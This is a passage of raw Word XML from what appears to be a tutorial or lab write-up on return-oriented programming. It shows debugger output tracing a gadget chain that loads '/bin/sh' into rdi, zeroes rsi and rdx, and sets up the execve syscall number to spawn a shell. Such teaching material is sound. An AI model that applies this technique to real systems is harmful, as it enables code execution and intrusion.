              <w:t xml:space="preserve">     0x400629 &lt;gadget_1+8&gt;     ret    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A007F6" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x40062a &lt;gadget_2+0&gt;     push   rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="145E1B2C" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x40062b &lt;gadget_2+1&gt;     mov    rbp, rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7945204D" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> →   0x40062e &lt;gadget_2+4&gt;     pop    rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="057EDAB2" w14:textId="4CF0A19A" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x40062f &lt;gadget_2+5&gt;     ret    </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F6ACA90" w14:textId="1C9DA2F4" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00017682">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Registers, </w:t>
      </w:r>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Operations at Breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD26B4" w14:textId="2E4AA7F2" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Right before </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Gadget B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, after </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Gadget </w:t>
      </w:r>
      <w:r w:rsidR="00017682" w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns, the stack pointer points to </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00017682">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00017682" w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:r w:rsidR="00017682">
        <w:t xml:space="preserve"> register points to </w:t>
      </w:r>
      <w:r w:rsidR="00017682" w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>"/bin/sh"</w:t>
      </w:r>
      <w:r w:rsidR="00017682" w:rsidRPr="00017682">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00017682" w14:paraId="67A20E65" w14:textId="77777777" w:rsidTr="00017682">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1B90B1AD" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 3, 0x0000000000400636 in gadget_3 ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18FCFF3C" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CD85BEA" w14:textId="1EBAF93F" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>registers ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="742E1FCE" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rsi   : 0x00000000006022a1  →  0x6361616162616161 ("aaabaaac"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28871142" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rdi   : 0x0000000000400708  →  0x0068732f6e69622f ("/bin/sh"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60ADC859" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rip   : 0x0000000000400636  →  &lt;gadget_3+4&gt; pop rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C87EF15" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56B5F9A5" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>code:x86:64 ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E3703EA" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x400631 &lt;gadget_2+7&gt;     ret    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9DDABC" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x400632 &lt;gadget_3+0&gt;     push   rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25DD3704" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x400633 &lt;gadget_3+1&gt;     mov    rbp, rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32944A54" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> →   0x400636 &lt;gadget_3+4&gt;     pop    rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45AF0D67" w14:textId="7DF442FE" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x400637 &lt;gadget_3+5&gt;     ret  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ADB4626" w14:textId="7B1C3016" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Registers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and Operations at Breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19490133" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFFA99" w14:textId="732CD089" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gadget 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> successfully set </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the stack pointer points to </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> again in preparation for </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Gadget C</w:t>
      </w:r>
      <w:r>
        <w:t>'s operations.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00017682" w14:paraId="65680882" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="32CCEA22" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 4, 0x000000000040063e in gadget_4 ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3EF277" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49F30E1A" w14:textId="6A0BCA9B" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>registers ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C70CA0C" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rsi   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E03F697" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rdi   : 0x0000000000400708  →  0x0068732f6e69622f ("/bin/sh"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5917DC97" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rip   : 0x000000000040063e  →  &lt;gadget_4+4&gt; pop rdx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A49CF2" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5325D19F" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE79534" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x00007fffffffddf0│+0x0000: </w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x0000000000000000     ← $rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B53E0EF" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddf8│+0x0008: 0x0000000000400646  →  &lt;gadget_5+4&gt; pop rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE8D9D0" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffde00│+0x0010: 0x000000000000003b (";"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF8C1C1" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x00007fffffffde08│+0x0018: 0x0000000000400625  →  &lt;gadget_1+4&gt; syscall </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0660E3" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4171D93B" w14:textId="5F0C1173" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>code:x86:64 ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C3074C" w14:textId="77777777" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x40063b &lt;gadget_4+1&gt;     mov    rbp, rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FBC6F3" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> →   0x40063e &lt;gadget_4+4&gt;     </w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>pop    rdx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788D7254" w14:textId="0F789069" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x40063f &lt;gadget_4+5&gt;     </w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ret    </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="341C21CD" w14:textId="0C96420A" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Registers, Stack, and Operations at Breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC95BCC" w14:textId="7A29E3FC" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Before </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Gadget D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs, </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the stack pointer points to </w:t>
      </w:r>
      <w:r w:rsidRPr="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x3b</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00017682" w14:paraId="1C5C00C0" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="15D679EB" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Breakpoint 5, 0x0000000000400646 in gadget_5 ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="600FF0B4" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>registers ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0357A7E3" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">$rdx   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47987CE8" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">$rsi   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFC9C69" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$rdi   : 0x0000000000400708  →  0x0068732f6e69622f ("/bin/sh"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509A5039" w14:textId="65ED9F04" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$rip   : 0x0000000000400646  →  &lt;gadget_5+4&gt; pop rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B047119" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0473B67C" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662C63D3" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0x00007fffffffde00│+0x0000: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">0x000000000000003b </w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:t>(";"?)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">     ← $rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFE7902" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0x00007fffffffde08│+0x0008: 0x0000000000400625  →  &lt;gadget_1+4&gt; syscall </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70751605" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0x00007fffffffde10│+0x0010: 0x00000000004004a9  →  &lt;_init+25&gt; ret </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF5A2D1" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1673DE6E" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
